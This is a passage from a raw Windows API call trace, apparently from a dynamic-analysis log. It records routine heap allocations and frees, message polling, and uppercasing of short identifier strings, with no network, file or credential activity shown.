Size=0x4) returned 0x2a71a98 [0086.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0086.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0086.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77580 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0086.406] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774e0 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778c8 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.407] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774e0 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.407] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0086.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0086.408] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774e0 [0086.408] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0086.408] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0086.408] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774e0 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.408] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.408] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0086.408] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774e0 [0086.409] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0086.409] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0086.409] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.409] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.409] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0086.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774e0 [0086.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741f0 [0086.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0086.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ef8 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741f0 | out: hHeap=0x2af0000) returned 1 [0086.412] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.412] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774e0 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0086.412] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0086.412] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a774e0 [0086.413] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: 